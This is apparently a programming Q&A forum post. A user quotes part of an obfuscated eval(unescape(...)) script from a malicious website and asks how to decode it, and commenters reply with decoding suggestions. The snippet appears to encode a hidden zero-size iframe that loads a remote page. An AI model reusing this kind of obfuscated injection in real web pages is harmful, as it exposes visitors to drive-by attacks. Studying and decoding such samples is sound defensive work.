# eval(unescape Decode HTML

Tags: javascript, html, escaping

This is a piece of code from a malicious website so I will only post part of the code. If anyone needs all of the code then DM me. This is to avoid any problems.

The webiste runs a script but it is encoded and I can't seem to decode it.

Does anyone know how to do this?

```
eval(unescape("&65;&35;&14;&54;&33;&63;&6; &36;&54;&20;&37;\"&61;&58;&58;&28;:\/\/&43;&58;&38;&51;&52;&4;&15;&19;.&58;&2;\/&51;&4;&11;&51;&64;&49;&27;&17;&47;&27;&64;6&27;&27;&21;&58;43&49;700&47;420.&61;&58;&4;&7;\" &13;&51;&11;&12;&15;&58;&33;&7;&7;&2;&13;&14;&16;&7;&7;&36;&50;&38;&51;&51;&19;&37;\"&58;&38;&16;&51;\" &4;&2;&21;&52;&7;&7;&2;&13;&48;&16;&7;&7;&43;&50;&38;&51;&51;&19;&37;\"&58;&38;&16;&51;\" &52;&7;&7;&2;&13;&48;&16;&7;&7;&43;&50;&38;&51;&51;&19;&37;\"&58;&38;&16;&51;\" &48;&38;&52;&4;&51;&11;&2;&38;&64;&51;&38;&37;\"0\" &4;&52;&38;&9;&15;&19;&13;&15;&64;&58;&61;&37;\"0\" &4;&52;&38;&9;&15;&19;&61;&51;&15;&9;&61;&58;&37;\"0\" &43;&50;&38;&2;&7;&7;&15;&19;&9;&37;\"&19;&2;\" &13;&15;&64;&58;&61;&37;\"100%\"
```

Any help/ideas/suggestions would be appreciated. Thanks

Comment: yup add all code in here and someone surely gonna help

Comment: @NirpendraPatel - I don't want to add all the code as I currently don't know what it runs and might be infectious. This is the coding used and once this first part if cracked the rest of the code will be readable by the same decoding method. Safer to keep all the code in my VM than publishing it on here to risk other users that don't know what they are doing.

Comment: slone ... lol lol lol .... do u even know decryted code can't be decoded without full code.

Comment: @JakeSloane That isn't correct. `unescape` is used to do as the name suggests - _unescape escaped characters_. It will remove the ` \ ` that are being used to escape the `"` characters etc. It has nothing to do with the obfuscation of the code. @Nirpedra is probably correct about needing to see the whole code.

Comment: Just remove the `eval` and it will yield the code.